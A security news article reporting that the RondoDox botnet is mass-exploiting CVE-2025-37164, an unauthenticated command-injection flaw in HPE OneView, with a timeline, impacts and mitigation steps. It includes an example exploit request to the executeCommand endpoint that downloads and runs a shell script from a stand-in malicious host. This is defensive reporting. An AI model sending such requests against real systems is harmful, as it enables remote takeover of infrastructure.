~/home/news/rondodox-botnet-mass-exploits-critical-hpe-oneview-2026-01-17
newsSaturday, January 17, 20268 min read👁 26 views

RondoDox Botnet Mass-Exploits Critical HPE OneView RCE (CVE-2025-37164)

Check Point Research confirms that the RondoDox botnet is actively exploiting CVE-2025-37164, a critical unauthenticated RCE in HPE OneView. Tens of thousands of attempts have been blocked, forcing immediate patching and network-segmentation actions.

HPE OneViewCVE-2025-37164RondoDoxRemote Code Execution

Overview

On January 7, 2026, Check Point Research disclosed an active, large-scale exploitation campaign targeting CVE-2025-37164, a critical remote code execution (RCE) flaw in Hewlett Packard Enterprise’s (HPE) OneView management platform. The campaign is being driven by the RondoDox botnet, a known IoT-focused malware family that has recently pivoted to high-value infrastructure services. Within a single four-hour window, Check Point observed more than 40,000 exploitation attempts, many of which were automatically blocked by its Quantum Intrusion Prevention System (IPS).

Technical Details

The vulnerability resides in the executeCommand REST API endpoint tied to the id-pools functionality of HPE OneView. The endpoint accepts a JSON payload containing a command field and forwards the value directly to the underlying operating system without any authentication or authorization checks. An attacker can therefore inject arbitrary shell commands and achieve full system compromise.

  • CVE Identifier: CVE-2025-37164
  • CVSS v3.1 Base Score: 9.8 (Critical)
  • Published: 16 Dec 2025 (HPE advisory)
  • Affected Products: All HPE OneView appliances (on-premises and cloud-connected) running versions prior to the December 2025 security patch.

RondoDox exploits the flaw by sending a crafted HTTP POST request to /rest/id-pools/executeCommand with a payload such as:

{ "command": "wget http://malicious.example.com/payload.sh -O /tmp/payload.sh && sh /tmp/payload.sh"
}

The botnet’s HTTP client identifies itself with a unique User-Agent string (e.g., RondoDox/2.1 (+https://rondodox.io)) that allowed Check Point to attribute the traffic to the malware family. After successful command execution, the payload typically installs a second-stage loader that connects back to C2 servers for further instructions, such as credential harvesting, lateral movement, or cryptocurrency mining.

Impact Analysis

Because OneView is the central point for managing compute, storage, and networking resources, an RCE on the appliance gives an adversary complete control over the data-center fabric. Potential impacts include:

  • Full takeover of server provisioning workflows.
  • Extraction or manipulation of sensitive configuration data (e.g., VLANs, SAN zoning).
  • Deployment of ransomware or destructive scripts across managed devices.
  • Persistence through creation of rogue admin accounts or back-door services.

Industries with heavy reliance on HPE infrastructure-government, financial services, manufacturing, and cloud service providers-have reported the highest volume of attacks. The United States, Australia, France, Germany, and Austria are the primary geographic sources of observed attempts.

Timeline of Events

  • 16 Dec 2025 - HPE releases advisory for CVE-2025-37164.
  • 21 Dec 2025 - Check Point deploys emergency IPS signatures for the vulnerability.
  • 21 Dec 2025 (evening) - First exploitation attempts detected in Check Point telemetry.
  • 07 Jan 2026 (05:45 UTC) - Spike to >40,000 automated attempts within 4 hours.
  • 07 Jan 2026 - Check Point reports activity to CISA; CVE added to the KEV catalog.
  • 08 Jan 2026 onward - Ongoing monitoring shows a steady stream of low-volume probing, indicating that the botnet is maintaining a foothold.

Mitigation & Recommendations

Organizations should act immediately. The following steps are proven to reduce exposure:

  1. Patch Now: Apply HPE’s December 2025 security update (or any later cumulative release) that validates input on the executeCommand endpoint.
  2. Network Segmentation: Isolate OneView appliances on a dedicated management VLAN with strict ACLs; block inbound traffic to port 443 from any untrusted network.
  3. IPS/IDS Rules: Deploy signatures that detect the distinctive User-Agent and the malformed JSON payload. Check Point’s public IPS rule set can be imported directly.
  4. Log Monitoring: Enable detailed request logging on OneView and forward logs to a SIEM. Look for anomalous POST requests to /rest/id-pools/executeCommand from unknown IPs.
  5. IOC Hunting: Search for known RondoDox indicators (hashes, C2 domains, the Dutch IP 185.30.208.112) across endpoints and network traffic.
  6. Credential Hygiene: Rotate any service accounts that may have been created post-compromise and enforce MFA on privileged consoles.

For organizations that cannot patch immediately, a temporary mitigation is to disable the id-pools API via the OneView configuration interface or a reverse-proxy rule that returns HTTP 403 for the endpoint.

Real-World Impact

Early reports from a U.S. federal agency indicate that an exploited OneView instance was used to re-image hundreds of servers with a malicious OS image, causing a week-long outage. A European financial services firm discovered unauthorized VLAN changes that allowed attackers to sniff inter-departmental traffic. In both cases, the root cause was the unpatched CVE-2025-37164.

These incidents illustrate that supply-chain management platforms-once considered “behind the firewall”-are now prime targets for botnets seeking high-value footholds. The RondoDox campaign demonstrates a shift from traditional DDoS-oriented attacks to sophisticated, persistence-focused exploitation.

Expert Opinion

From a strategic standpoint, the rapid weaponization of CVE-2025-37164 underscores three industry-wide lessons:

  • Infrastructure-as-Software is a Hard Target: Management APIs are increasingly exposed to internal networks that are themselves compromised. Organizations must treat these services with the same rigor as public-facing applications.
  • Botnet Evolution: RondoDox’s pivot from IoT DDoS attacks to high-impact RCE exploits signals a maturation of botnet capabilities. Expect more “hybrid” botnets that combine mass-scale scanning with targeted exploitation.
  • KEV Catalog Effectiveness: The addition of CVE-2025-37164 to the CISA Known Exploited Vulnerabilities list accelerated patch adoption for many enterprises. Continued collaboration between vendors, researchers, and government agencies is essential to shorten the window of exposure.

In short, the RondoDox campaign is a wake-up call: supply-chain hardware management platforms must be incorporated into regular Red-Team assessments, and their API surfaces should be continuously hardened.